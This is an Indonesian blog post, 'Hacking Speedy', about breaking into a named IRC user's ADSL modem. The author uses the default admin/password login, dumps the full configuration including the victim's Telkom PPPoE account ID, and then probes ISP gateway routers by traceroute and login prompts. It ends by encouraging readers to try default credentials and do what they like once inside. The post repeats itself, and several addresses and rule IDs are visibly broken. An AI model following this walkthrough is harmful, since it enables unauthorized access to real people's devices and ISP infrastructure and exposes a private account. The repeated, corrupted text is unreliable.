Setelah beberapa step tadi, virus tidak dapat menjalankan dirinya di komputer lain ketika kita mencolokan flashdisk kita kedalam port usb-nya. Tetapi bang blckflcn, virus2 dari komputer yang terinfeksi tersebut masih ada di dalam flashdisk saya. Bagaimana ini? Yah, itu sih bukan tugas saya lagi. Itu sih sudah menjadi tugas anti-virus… saya hanya memberitahukan cara agar virusnya tidak berjalan ketika flashdisk kita dicolokan kedalam port usb pada komputer yang lain… lagian mantra yang saya punya masih belum begitu ampuh untuk membuat virus tidak berjalan di komputer. Oleh karena itu, saya akan belajar tentang mantra2 tersebut di hogwarts agar lebih ampuh.
Read More..
Hacking Speedy
Saya pernah merasa tertantang ada seorang anak di mirc Allnetwork merasa dirinya hebat lalu saya mencoba ceking ip nya rupanya percuma kita ddos karena IP dia random setiap sekali down ip dia ganti.
Dan jangan lupa lagi bahwa setiap ID itu berdasarkan Line tlp setau saya seh begitu jadi kalau kita hack usernya sama aja jadi selusinya gimana Ya kita bobol server nya ihhiihihihih…
co_exmud is User10@125.164.72.124 * Ashof Yusiko
co_exmud on #surabaya #Malang
Saya akan mencoba masuk ke server dia karena saya lihat dari ident nya dia User10 berarti tidak jauh dia main di warnet dia user hehehe Allnet kan orangnya begitu tau dikit udah maju …. hi hi hi hi
setau saya semuanya user speedy memakai Modem kalau enngak salah ya, Jadi dia mempunyai web basic untuk meremote atau mensetnya..
http://125.164.72.124/ << bukak di IE anda masukan default dari pass modem PRolink seri itu Login : admin Password : password
Dam…. masuk kita ke modem mereka dah sekarang kita mau mendapatkan password dan Login nya kita dump ..
create user name admin passwd password root
size maxvc 8 max1483vc 8 maxppe 8 maxl2tptunnel 1 maxl2tpsesspertunnel 1 maxl2tppeerrws 4
modify system contact “Conexant Inc.,100 Schulz Drive, Red Bank,NJ 07701,U.S.A” model “H90″ location “Conexant Inc.,100 Schulz Drive, Red Bank,NJ 07701,U.S.A” vendor “Conexant Inc.,100 Schulz Drive, Red Bank,NJ 07701,U.S.A” logthresh 1 systime “Jan 01 01:01:08 1970″ timezone “GMT” magicnum 125
modify bridge mode enable
create pfraw rule entry ruleid 15 ifname private dir in act deny
create pfraw rule entry ruleid 16 ifname private act deny
create pfraw rule entry ruleid 17 ifname private dir in act deny
create pfraw rule entry ruleid 18 ifname private act deny
create pfraw rule entry ruleid 19 ifname private dir in act deny
create pfraw rule entry ruleid ifname private act deny
create pfraw rule entry ruleid 21 ifname private dir in act deny
create pfraw rule entry ruleid 22 ifname private act deny
create pfraw rule entry ruleid 23 ifname private dir in act deny
create pfraw rule entry ruleid 24 ifname private act deny
create pfraw rule entry ruleid 25 ifname private dir in act deny
create pfraw rule entry ruleid 26 ifname private act deny
create pfraw rule entry ruleid 27 ifname private dir in act deny
create pfraw rule entry ruleid 28 ifname private act deny
create pfraw rule entry ruleid 29 ifname private dir in act deny
create pfraw rule entry ruleid 30 ifname private act deny
create pfraw rule entry ruleid 31 ifname private dir in act deny
create pfraw rule entry ruleid 32 ifname private act deny
create pfraw rule entry ruleid 33 ifname private dir in act deny
create pfraw rule entry ruleid 34 ifname private act deny
create pfraw rule entry ruleid 35 ifname private dir in act callmgmt
create pfraw rule entry ruleid 36 ifname dmz dir in act callmgmt
create pfraw rule entry ruleid 37 dir in act callmgmt
create pfraw subrule entry ruleid 15 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8863 0×8864
create pfraw subrule entry ruleid 16 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8863 0×8864
create pfraw subrule entry ruleid 17 subruleid 1 mask 0xFFFFFFFF start iph offset 16 enable cmpt range 0xE0000000 0xEFFFFFFF
create pfraw subrule entry ruleid 18 subruleid 1 mask 0xFFFFFFFF start iph offset 16 enable cmpt range 0xE0000000 0xEFFFFFFF
create pfraw subrule entry ruleid 19 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×8035
create pfraw subrule entry ruleid subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×8035
create pfraw subrule entry ruleid 21 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×809B
create pfraw subrule entry ruleid 22 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×809B
create pfraw subrule entry ruleid 23 subruleid 1 mask 0xFFFF offset 12 enable cmpt lteq 0×05DC
create pfraw subrule entry ruleid 23 subruleid 2 mask 0xFFFF offset 14 enable cmpt eq 0xF0F0
create pfraw subrule entry ruleid 24 subruleid 1 mask 0xFFFF offset 12 enable cmpt lteq 0×05DC
create pfraw subrule entry ruleid 24 subruleid 2 mask 0xFFFF offset 14 enable cmpt eq 0xF0F0
create pfraw subrule entry ruleid 25 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8137 0×8138
create pfraw subrule entry ruleid 26 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8137 0×8138
create pfraw subrule entry ruleid 27 subruleid 1 mask 0xFFFFFFFFFFFF offset 0 enable cmpt eq 0×0180C00000
create pfraw subrule entry ruleid 28 subruleid 1 mask 0xFFFFFFFFFFFF offset 0 enable cmpt eq 0×0180C00000
create pfraw subrule entry ruleid 29 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×0806
create pfraw subrule entry ruleid 30 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×0806
create pfraw subrule entry ruleid 31 subruleid 1 mask 0xFFFF offset 0 enable cmpt eq 0×3333
create pfraw subrule entry ruleid 32 subruleid 1 mask 0xFFFF offset 0 enable cmpt eq 0×3333
create pfraw subrule entry ruleid 33 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×8100
create pfraw subrule entry ruleid 34 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×8100
create pfraw subrule entry ruleid 35 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8863 0×8864
create pfraw subrule entry ruleid 36 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8863 0×8864
create pfraw subrule entry ruleid 37 subruleid 1 mask 0xFF offset 15 enable cmpt eq 0xA7
create ipf rule entry ruleid 1002 dir in act accept destaddr eq 255.255.255.255 transprot eq num 17 destport eq num 67 seclevel high
create ipf rule entry ruleid 1010 dir in destaddr bcast seclevel high
create ipf rule entry ruleid 10 dir in destaddr eq 255.255.255.255 seclevel high
create ipf rule entry ruleid 1030 ifname private dir in act accept storestate enable seclevel high medium low
create ipf rule entry ruleid 1040 ifname private dir out act accept srcaddr self storestate enable seclevel high medium low
create ipf rule entry ruleid 1050 ifname private dir out act accept transprot eq num 17 destport eq num 53 inifname dmz storestate enable seclevel high medium low
create ipf rule entry ruleid 1060 ifname private dir out act accept transprot eq num 6 destport eq num 53 inifname dmz storestate enable seclevel high medium low
create ipf rule entry ruleid 1070 ifname private dir out act accept transprot eq num 6 destport eq num 25 inifname dmz storestate enable seclevel high medium low
create ipf rule entry ruleid 1080 ifname private dir out act accept transprot eq num 6 destport eq num 110 inifname dmz storestate enable seclevel high medium low
create ipf rule entry ruleid 1090 ifname private dir out act accept transprot eq num 6 destport eq num 21 inifname dmz storestate enable seclevel medium low
create ipf rule entry ruleid 1100 ifname private dir out act accept transprot eq num 6 destport eq num 80 inifname dmz storestate enable seclevel medium low
create ipf rule entry ruleid 1110 ifname private dir out act accept transprot eq num 6 destport eq num 23 inifname dmz storestate enable
create ipf rule entry ruleid 11 ifname private dir out act accept transprot eq num 1 inifname dmz storestate enable
create ipf rule entry ruleid 1130 ifname dmz dir out transprot eq num 6 destport eq num 23 inifname private seclevel high
create ipf rule entry ruleid 1140 ifname dmz dir out transprot eq num 17 destport eq num 53 inifname public seclevel high
create ipf rule entry ruleid 1150 ifname dmz dir out transprot eq num 6 destport eq num 53 inifname public seclevel high
create ipf rule entry ruleid 1160 ifname dmz dir out transprot eq num 6 destport eq num 21 inifname public seclevel high
create ipf rule entry ruleid 1170 ifname dmz dir out transprot eq num 6 destport eq num 23 inifname public seclevel high medium low
create ipf rule entry ruleid 1180 ifname dmz dir out transprot eq num 1 inifname public seclevel high medium
create ipf rule entry ruleid 1190 ifname public dir out transprot eq num 6 destport eq num 23 seclevel high
create ipf rule entry ruleid 10 ifname public dir out act accept srcaddr self storestate enable seclevel high medium low
create ipf rule entry ruleid 1210 ifname public dir in destaddr bcast seclevel medium
create ipf rule entry ruleid 12 ifname public dir in destaddr eq 255.255.255.255 seclevel medium
create ipf rule entry ruleid 1230 ifname public dir in transprot eq num 17 destport eq num 7 seclevel high medium
create ipf rule entry ruleid 1240 ifname public dir in transprot eq num 17 destport eq num 9 seclevel high medium
create ipf rule entry ruleid 1250 ifname public dir in transprot eq num 17 destport eq num 19 seclevel high medium
create ipf rule entry ruleid 1260 ifname public dir in destaddr self transprot eq num 6 destport eq num 80 seclevel high medium low
create ipf rule entry ruleid 1270 ifname public dir in destaddr self transprot eq num 17 destport eq num 53 seclevel high
create ipf rule entry ruleid 1280 ifname public dir in destaddr self transprot eq num 6 destport eq num 53 seclevel high
create ipf rule entry ruleid 1290 ifname public dir in destaddr self transprot eq num 6 destport eq num 21 seclevel high medium low
create ipf rule entry ruleid 1300 ifname public dir in destaddr self transprot eq num 6 destport eq num 23 seclevel high medium low
create ipf rule entry ruleid 1310 ifname public dir in destaddr self transprot eq num 1 seclevel high medium
create ipf rule entry ruleid 13 ifname public dir in act accept destaddr self transprot eq num 17 destport eq num 53 storestate enable seclevel medium low
create ipf rule entry ruleid 1330 ifname public dir in act accept destaddr self transprot eq num 6 destport eq num 53 storestate enable seclevel medium low
create ipf rule entry ruleid 1340 ifname public dir in seclevel high isipopt yes
create ipf rule entry ruleid 1350 ifname public dir in seclevel high isfrag yes
create ipf rule entry ruleid 1360 ifname dmz dir in destaddr self transprot eq num 6 destport eq num 80 seclevel high medium
create ipf rule entry ruleid 1370 ifname dmz dir in destaddr self transprot eq num 6 destport eq num 21 seclevel high medium
create ipf rule entry ruleid 1380 ifname dmz dir in destaddr self transprot eq num 6 destport eq num 23 seclevel high medium
create ipf rule entry ruleid 1390 ifname dmz dir in act accept storestate enable seclevel high medium low
modify ipf global pubdefact accept pvtdefact deny dmzdefact accept
modify dhcp server cfg enable
create dhcp server pool start-ip 192.168.1.3 poolid 0 end-ip 192.168.1.34 mask 255.255.255.0
modify snmp trap disable
create rip intf ifname ppp-0
create ethernet intf ifname eth-0 ip 192.168.1.1 mask 255.255.255.0
create usb intf ifname usb-0 ip 192.168.1.2 mask 255.255.255.0
modify ip cfg ttl 64
modify dsl config adsl2plusauto annex adsl2plus framing-3et maxbits 15 rxstart 6 rxend 511 duallatency disable ecfdmmode ec maxdnrate 0×1ff autosraenable disable advcapability annexa adsl2 adsl2plus t1413
create atm port enable ifname atm-0 maxvc 8 oamsrc 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
create ppp security ifname default
create ppp security ifname ppp-0 login 1527050063@telkom.net passwd (saya Hidden) he he he kasihan nanti
create atm trfdesc trfindex 0
create atm vc intf ifname aal5-0 lowif atm-0 vpi 0 vci 35 a5maxproto 2
create ppp intf ifname ppp-0 mru 1492 lowif aal5-0 droute true ppoe outside usedns true
modify nat global enable
create nat rule entry ruleid 1 napt
create alg port portno 21 prot num 6 algtype ftp
create alg port portno 1701 prot num 17 algtype l2tp
create alg port portno 1723 prot num 6 algtype pptp
create alg port portno 554 prot num 6 algtype rtsp
create alg port portno 7070 prot num 6 algtype ra
create alg port portno 7648 prot num 6 algtype cuseeme
create alg port portno 1719 prot num 17 algtype h323_ras
create alg port portno 17 prot num 6 algtype h323_q931
create alg port portno 6661 prot num 6 algtype mirc
create alg port portno 6662 prot num 6 algtype mirc
create alg port portno 6663 prot num 6 algtype mirc
create alg port portno 6664 prot num 6 algtype mirc
create alg port portno 6665 prot num 6 algtype mirc
create alg port portno 6666 prot num 6 algtype mirc
create alg port portno 6667 prot num 6 algtype mirc
create alg port portno 6668 prot num 6 algtype mirc
create alg port portno 6669 prot num 6 algtype mirc
create alg port portno 161 prot num 17 algtype snmp
create alg port portno 407 prot num 17 algtype timbuktu
create alg port portno 6301 prot num 17 algtype sgicompcore
create alg port portno 1863 prot num 6 upnpaware true algtype msnmsgr
create alg port portno 389 prot num 6 algtype ldap
create alg port portno 1002 prot num 6 algtype ldap
create alg port portno 500 prot num 17 algtype ike
create alg port portno 0 prot num 50 algtype esp
create alg port portno 1503 prot num 6 upnpaware true algtype t1
create alg port portno 5060 upnpaware true algtype sip
create alg port portno 5190 prot num 6 algtype icq
create bridge port intf ifname eth-0
modify stp port info ifname eth-0 priority 0×80 pcost 100
create dhcp relay intf ifname ppp-0
create igmp intf ifname ppp-0 host
modify autodetect cfg prot ppoe eoa
modify upnp cfg nbstatus enable
modify ilmi access protocol ifname atm-0 vpi 0 vci 35 proto any
trigger ilmi
END
Dah Di atas tersebut hasil dump saya tidak bisa menunjukan bagaimana cara dump tsb karena saya takut kawan kawan yang mempunyai etika jelek merusak atau menyalah gunakan dari artikel ini..
oke sekarang kan logikanya satu line satu user jadi enngak mungkin kita masuk ke user mereka sekarang kita cobak tembus ke main routernya atau server utama Gateway mereka.
C:\>tracert www.malanghack.net
Tracing route to malanghack.net [2.67.10.157]
over a maximum of 30 hops:
1 <1 ms <1 ms <1 ms 192.168.1.1
2 69 ms 66 ms 65 ms 1.subnet125-164-96.speedy.telkom.net.id [125.164.96.1]
3 69 ms 64 ms 66 ms 33.subnet125-160-1.speedy.telkom.net.id [125.160.1.33]
4 83 ms 96 ms 87 ms dhe-2-67-8-.static.dhecyber.net.id [2.67.8
.]
5 81 ms 79 ms 79 ms dhe-2-67-10-157.static.dhecyber.net.id [2.67
.10.157]
Trace complete.
C:\>
Anda bisa lihat saya mencoba meminjam modem dan mencoba di rumah saya hasil nya kita dapat konek dengan access speedy unlimite he he he he
125.164.96.1 << ini gateway nya tapi ini kek nya GW untuk personal alias Rumahan
oke bentar saya tanyak ama kawan yang pakai speedy di warnetnya.
Hadi: gus
Hadi: ketik nang dos koyok wingi
juss_orange: hadir
juss_orange: woce
Hadi: tracert www.malanghack.net
Hadi: paste mrene
Hadi: endi cok
juss_orange: Tracing route to malanghack.net [2.67.10.157]
over a maximum of 30 hops:
1 <1 ms <1 ms <1 ms 192.168.0.1
2 <1 ms <1 ms <1 ms 192.168.1.1
3 53 ms 52 ms 53 ms 1.subnet125-164-127.speedy.telkom.net.id [125.164.127.1]
4 55 ms 52 ms 53 ms 33.subnet125-160-1.speedy.telkom.net.id [125.160.1.33]
5 521 ms 425 ms 82 ms dhe-2-67-8-.static.dhecyber.net.id [2.67.8.]
6 489 ms 838 ms 607 ms dhe-2-67-10-157.static.dhecyber.net.id [2.67.10.157]
Hadi: oke thanks
Itu hasil di warnet jadi GW warnet 125.164.127.1 << ini he he he
sekarang kita cobak masuk ke router telkom pusat Gatewaynya
******************************************************* **
* All rights reserved (1997-04) &n bsp; *
* Without the owner’s prior written consent, *
*no decompiling or reverse-engineering shall be allowed.*
******************************************************* **
Login authentication
Password:
Note: The max number of VTY users is 5, and the current number
of VTY users on line is 1.
hehehe ITu main router dari 125.164.96.1 Gw personal sekarang kita cobak dari GW warnet apa sama ?
******************************************************* **
* All rights reserved (1997-04) &n bsp; *
* Without the owner’s prior written consent, *
*no decompiling or reverse-engineering shall be allowed.*
******************************************************* **
Login authentication
Password:
Note: The max number of VTY users is 5, and the current number
of VTY users on line is 1.
Ha ha ha ha rupanya sapa personal ama warnet
?
User view commands:
bootload Set bootload information
cd &n bsp; Change current directory
clock Specify the system clock
compare Compare function
copy Copy from one file to another
debugging Enable system debugging functions
delete Delete a file
dir List files on a file system
display Display current system information
downsfu Down SFU’s DASL port
fixdisk Recover lost chains in storage device
format Format the device
free Clear user terminal interface
ftp Open FTP connection
language-mode Specify the language environment
lock Lock current user terminal interface
mkdir Create a new directory
more Display the contents of a file
move Move the file
msdp-tracert MSDP traceroute to source RP
mtracert Traceroute to multicast source
net Set net switch mode
patch Patch subcommands
ping Ping function
pwd Display current working directory
quit Exit from current command view
reboot Reboot whole router.
refresh Refresh routes
rename Rename a file or directory
reset Reset operation
rmdir Remove an existing directory
save Save current configuration
schedule schedule system task
send Send information to other user terminal interface
slave Specify HA command
startup Config paramater for system to startup
super Privilege current user a specified priority level
switch Switch communication channel
system-view Enter the system view
telnet Establish one TELNET connection
terminal Set the terminal line characteristics
tftp Open TFTP connection
tracert Trace route function
undelete Recover a deleted file
undo Cancel current setting
unzip Decompress a file
upgrade Online upgrade software
xmodem Receive a file by Xmodem protocol
zip Compress a file
itu command dari xmodem mereka …..
Oke sekarang kita analisa dari di atas.
Prolink modem biasanya password default mereka login : admin pass: password atau ada merk soho Login : admin : adslroot dll
silakan tergantung kreatifitas anda he he he.
Kalau kita dah masuk server itu tergantung kita mau apakan itu hehehe
Read More..
Dan jangan lupa lagi bahwa setiap ID itu berdasarkan Line tlp setau saya seh begitu jadi kalau kita hack usernya sama aja jadi selusinya gimana Ya kita bobol server nya ihhiihihihih…
co_exmud is User10@125.164.72.124 * Ashof Yusiko
co_exmud on #surabaya #Malang
Saya akan mencoba masuk ke server dia karena saya lihat dari ident nya dia User10 berarti tidak jauh dia main di warnet dia user hehehe Allnet kan orangnya begitu tau dikit udah maju …. hi hi hi hi
setau saya semuanya user speedy memakai Modem kalau enngak salah ya, Jadi dia mempunyai web basic untuk meremote atau mensetnya..
http://125.164.72.124/ << bukak di IE anda masukan default dari pass modem PRolink seri itu Login : admin Password : password
Dam…. masuk kita ke modem mereka dah sekarang kita mau mendapatkan password dan Login nya kita dump ..
create user name admin passwd password root
size maxvc 8 max1483vc 8 maxppe 8 maxl2tptunnel 1 maxl2tpsesspertunnel 1 maxl2tppeerrws 4
modify system contact “Conexant Inc.,100 Schulz Drive, Red Bank,NJ 07701,U.S.A” model “H90″ location “Conexant Inc.,100 Schulz Drive, Red Bank,NJ 07701,U.S.A” vendor “Conexant Inc.,100 Schulz Drive, Red Bank,NJ 07701,U.S.A” logthresh 1 systime “Jan 01 01:01:08 1970″ timezone “GMT” magicnum 125
modify bridge mode enable
create pfraw rule entry ruleid 15 ifname private dir in act deny
create pfraw rule entry ruleid 16 ifname private act deny
create pfraw rule entry ruleid 17 ifname private dir in act deny
create pfraw rule entry ruleid 18 ifname private act deny
create pfraw rule entry ruleid 19 ifname private dir in act deny
create pfraw rule entry ruleid ifname private act deny
create pfraw rule entry ruleid 21 ifname private dir in act deny
create pfraw rule entry ruleid 22 ifname private act deny
create pfraw rule entry ruleid 23 ifname private dir in act deny
create pfraw rule entry ruleid 24 ifname private act deny
create pfraw rule entry ruleid 25 ifname private dir in act deny
create pfraw rule entry ruleid 26 ifname private act deny
create pfraw rule entry ruleid 27 ifname private dir in act deny
create pfraw rule entry ruleid 28 ifname private act deny
create pfraw rule entry ruleid 29 ifname private dir in act deny
create pfraw rule entry ruleid 30 ifname private act deny
create pfraw rule entry ruleid 31 ifname private dir in act deny
create pfraw rule entry ruleid 32 ifname private act deny
create pfraw rule entry ruleid 33 ifname private dir in act deny
create pfraw rule entry ruleid 34 ifname private act deny
create pfraw rule entry ruleid 35 ifname private dir in act callmgmt
create pfraw rule entry ruleid 36 ifname dmz dir in act callmgmt
create pfraw rule entry ruleid 37 dir in act callmgmt
create pfraw subrule entry ruleid 15 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8863 0×8864
create pfraw subrule entry ruleid 16 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8863 0×8864
create pfraw subrule entry ruleid 17 subruleid 1 mask 0xFFFFFFFF start iph offset 16 enable cmpt range 0xE0000000 0xEFFFFFFF
create pfraw subrule entry ruleid 18 subruleid 1 mask 0xFFFFFFFF start iph offset 16 enable cmpt range 0xE0000000 0xEFFFFFFF
create pfraw subrule entry ruleid 19 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×8035
create pfraw subrule entry ruleid subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×8035
create pfraw subrule entry ruleid 21 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×809B
create pfraw subrule entry ruleid 22 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×809B
create pfraw subrule entry ruleid 23 subruleid 1 mask 0xFFFF offset 12 enable cmpt lteq 0×05DC
create pfraw subrule entry ruleid 23 subruleid 2 mask 0xFFFF offset 14 enable cmpt eq 0xF0F0
create pfraw subrule entry ruleid 24 subruleid 1 mask 0xFFFF offset 12 enable cmpt lteq 0×05DC
create pfraw subrule entry ruleid 24 subruleid 2 mask 0xFFFF offset 14 enable cmpt eq 0xF0F0
create pfraw subrule entry ruleid 25 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8137 0×8138
create pfraw subrule entry ruleid 26 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8137 0×8138
create pfraw subrule entry ruleid 27 subruleid 1 mask 0xFFFFFFFFFFFF offset 0 enable cmpt eq 0×0180C00000
create pfraw subrule entry ruleid 28 subruleid 1 mask 0xFFFFFFFFFFFF offset 0 enable cmpt eq 0×0180C00000
create pfraw subrule entry ruleid 29 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×0806
create pfraw subrule entry ruleid 30 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×0806
create pfraw subrule entry ruleid 31 subruleid 1 mask 0xFFFF offset 0 enable cmpt eq 0×3333
create pfraw subrule entry ruleid 32 subruleid 1 mask 0xFFFF offset 0 enable cmpt eq 0×3333
create pfraw subrule entry ruleid 33 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×8100
create pfraw subrule entry ruleid 34 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×8100
create pfraw subrule entry ruleid 35 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8863 0×8864
create pfraw subrule entry ruleid 36 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8863 0×8864
create pfraw subrule entry ruleid 37 subruleid 1 mask 0xFF offset 15 enable cmpt eq 0xA7
create ipf rule entry ruleid 1002 dir in act accept destaddr eq 255.255.255.255 transprot eq num 17 destport eq num 67 seclevel high
create ipf rule entry ruleid 1010 dir in destaddr bcast seclevel high
create ipf rule entry ruleid 10 dir in destaddr eq 255.255.255.255 seclevel high
create ipf rule entry ruleid 1030 ifname private dir in act accept storestate enable seclevel high medium low
create ipf rule entry ruleid 1040 ifname private dir out act accept srcaddr self storestate enable seclevel high medium low
create ipf rule entry ruleid 1050 ifname private dir out act accept transprot eq num 17 destport eq num 53 inifname dmz storestate enable seclevel high medium low
create ipf rule entry ruleid 1060 ifname private dir out act accept transprot eq num 6 destport eq num 53 inifname dmz storestate enable seclevel high medium low
create ipf rule entry ruleid 1070 ifname private dir out act accept transprot eq num 6 destport eq num 25 inifname dmz storestate enable seclevel high medium low
create ipf rule entry ruleid 1080 ifname private dir out act accept transprot eq num 6 destport eq num 110 inifname dmz storestate enable seclevel high medium low
create ipf rule entry ruleid 1090 ifname private dir out act accept transprot eq num 6 destport eq num 21 inifname dmz storestate enable seclevel medium low
create ipf rule entry ruleid 1100 ifname private dir out act accept transprot eq num 6 destport eq num 80 inifname dmz storestate enable seclevel medium low
create ipf rule entry ruleid 1110 ifname private dir out act accept transprot eq num 6 destport eq num 23 inifname dmz storestate enable
create ipf rule entry ruleid 11 ifname private dir out act accept transprot eq num 1 inifname dmz storestate enable
create ipf rule entry ruleid 1130 ifname dmz dir out transprot eq num 6 destport eq num 23 inifname private seclevel high
create ipf rule entry ruleid 1140 ifname dmz dir out transprot eq num 17 destport eq num 53 inifname public seclevel high
create ipf rule entry ruleid 1150 ifname dmz dir out transprot eq num 6 destport eq num 53 inifname public seclevel high
create ipf rule entry ruleid 1160 ifname dmz dir out transprot eq num 6 destport eq num 21 inifname public seclevel high
create ipf rule entry ruleid 1170 ifname dmz dir out transprot eq num 6 destport eq num 23 inifname public seclevel high medium low
create ipf rule entry ruleid 1180 ifname dmz dir out transprot eq num 1 inifname public seclevel high medium
create ipf rule entry ruleid 1190 ifname public dir out transprot eq num 6 destport eq num 23 seclevel high
create ipf rule entry ruleid 10 ifname public dir out act accept srcaddr self storestate enable seclevel high medium low
create ipf rule entry ruleid 1210 ifname public dir in destaddr bcast seclevel medium
create ipf rule entry ruleid 12 ifname public dir in destaddr eq 255.255.255.255 seclevel medium
create ipf rule entry ruleid 1230 ifname public dir in transprot eq num 17 destport eq num 7 seclevel high medium
create ipf rule entry ruleid 1240 ifname public dir in transprot eq num 17 destport eq num 9 seclevel high medium
create ipf rule entry ruleid 1250 ifname public dir in transprot eq num 17 destport eq num 19 seclevel high medium
create ipf rule entry ruleid 1260 ifname public dir in destaddr self transprot eq num 6 destport eq num 80 seclevel high medium low
create ipf rule entry ruleid 1270 ifname public dir in destaddr self transprot eq num 17 destport eq num 53 seclevel high
create ipf rule entry ruleid 1280 ifname public dir in destaddr self transprot eq num 6 destport eq num 53 seclevel high
create ipf rule entry ruleid 1290 ifname public dir in destaddr self transprot eq num 6 destport eq num 21 seclevel high medium low
create ipf rule entry ruleid 1300 ifname public dir in destaddr self transprot eq num 6 destport eq num 23 seclevel high medium low
create ipf rule entry ruleid 1310 ifname public dir in destaddr self transprot eq num 1 seclevel high medium
create ipf rule entry ruleid 13 ifname public dir in act accept destaddr self transprot eq num 17 destport eq num 53 storestate enable seclevel medium low
create ipf rule entry ruleid 1330 ifname public dir in act accept destaddr self transprot eq num 6 destport eq num 53 storestate enable seclevel medium low
create ipf rule entry ruleid 1340 ifname public dir in seclevel high isipopt yes
create ipf rule entry ruleid 1350 ifname public dir in seclevel high isfrag yes
create ipf rule entry ruleid 1360 ifname dmz dir in destaddr self transprot eq num 6 destport eq num 80 seclevel high medium
create ipf rule entry ruleid 1370 ifname dmz dir in destaddr self transprot eq num 6 destport eq num 21 seclevel high medium
create ipf rule entry ruleid 1380 ifname dmz dir in destaddr self transprot eq num 6 destport eq num 23 seclevel high medium
create ipf rule entry ruleid 1390 ifname dmz dir in act accept storestate enable seclevel high medium low
modify ipf global pubdefact accept pvtdefact deny dmzdefact accept
modify dhcp server cfg enable
create dhcp server pool start-ip 192.168.1.3 poolid 0 end-ip 192.168.1.34 mask 255.255.255.0
modify snmp trap disable
create rip intf ifname ppp-0
create ethernet intf ifname eth-0 ip 192.168.1.1 mask 255.255.255.0
create usb intf ifname usb-0 ip 192.168.1.2 mask 255.255.255.0
modify ip cfg ttl 64
modify dsl config adsl2plusauto annex adsl2plus framing-3et maxbits 15 rxstart 6 rxend 511 duallatency disable ecfdmmode ec maxdnrate 0×1ff autosraenable disable advcapability annexa adsl2 adsl2plus t1413
create atm port enable ifname atm-0 maxvc 8 oamsrc 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
create ppp security ifname default
create ppp security ifname ppp-0 login 1527050063@telkom.net passwd (saya Hidden) he he he kasihan nanti
create atm trfdesc trfindex 0
create atm vc intf ifname aal5-0 lowif atm-0 vpi 0 vci 35 a5maxproto 2
create ppp intf ifname ppp-0 mru 1492 lowif aal5-0 droute true ppoe outside usedns true
modify nat global enable
create nat rule entry ruleid 1 napt
create alg port portno 21 prot num 6 algtype ftp
create alg port portno 1701 prot num 17 algtype l2tp
create alg port portno 1723 prot num 6 algtype pptp
create alg port portno 554 prot num 6 algtype rtsp
create alg port portno 7070 prot num 6 algtype ra
create alg port portno 7648 prot num 6 algtype cuseeme
create alg port portno 1719 prot num 17 algtype h323_ras
create alg port portno 17 prot num 6 algtype h323_q931
create alg port portno 6661 prot num 6 algtype mirc
create alg port portno 6662 prot num 6 algtype mirc
create alg port portno 6663 prot num 6 algtype mirc
create alg port portno 6664 prot num 6 algtype mirc
create alg port portno 6665 prot num 6 algtype mirc
create alg port portno 6666 prot num 6 algtype mirc
create alg port portno 6667 prot num 6 algtype mirc
create alg port portno 6668 prot num 6 algtype mirc
create alg port portno 6669 prot num 6 algtype mirc
create alg port portno 161 prot num 17 algtype snmp
create alg port portno 407 prot num 17 algtype timbuktu
create alg port portno 6301 prot num 17 algtype sgicompcore
create alg port portno 1863 prot num 6 upnpaware true algtype msnmsgr
create alg port portno 389 prot num 6 algtype ldap
create alg port portno 1002 prot num 6 algtype ldap
create alg port portno 500 prot num 17 algtype ike
create alg port portno 0 prot num 50 algtype esp
create alg port portno 1503 prot num 6 upnpaware true algtype t1
create alg port portno 5060 upnpaware true algtype sip
create alg port portno 5190 prot num 6 algtype icq
create bridge port intf ifname eth-0
modify stp port info ifname eth-0 priority 0×80 pcost 100
create dhcp relay intf ifname ppp-0
create igmp intf ifname ppp-0 host
modify autodetect cfg prot ppoe eoa
modify upnp cfg nbstatus enable
modify ilmi access protocol ifname atm-0 vpi 0 vci 35 proto any
trigger ilmi
END
Dah Di atas tersebut hasil dump saya tidak bisa menunjukan bagaimana cara dump tsb karena saya takut kawan kawan yang mempunyai etika jelek merusak atau menyalah gunakan dari artikel ini..
oke sekarang kan logikanya satu line satu user jadi enngak mungkin kita masuk ke user mereka sekarang kita cobak tembus ke main routernya atau server utama Gateway mereka.
C:\>tracert www.malanghack.net
Tracing route to malanghack.net [2.67.10.157]
over a maximum of 30 hops:
1 <1 ms <1 ms <1 ms 192.168.1.1
2 69 ms 66 ms 65 ms 1.subnet125-164-96.speedy.telkom.net.id [125.164.96.1]
3 69 ms 64 ms 66 ms 33.subnet125-160-1.speedy.telkom.net.id [125.160.1.33]
4 83 ms 96 ms 87 ms dhe-2-67-8-.static.dhecyber.net.id [2.67.8
.]
5 81 ms 79 ms 79 ms dhe-2-67-10-157.static.dhecyber.net.id [2.67
.10.157]
Trace complete.
C:\>
Anda bisa lihat saya mencoba meminjam modem dan mencoba di rumah saya hasil nya kita dapat konek dengan access speedy unlimite he he he he
125.164.96.1 << ini gateway nya tapi ini kek nya GW untuk personal alias Rumahan
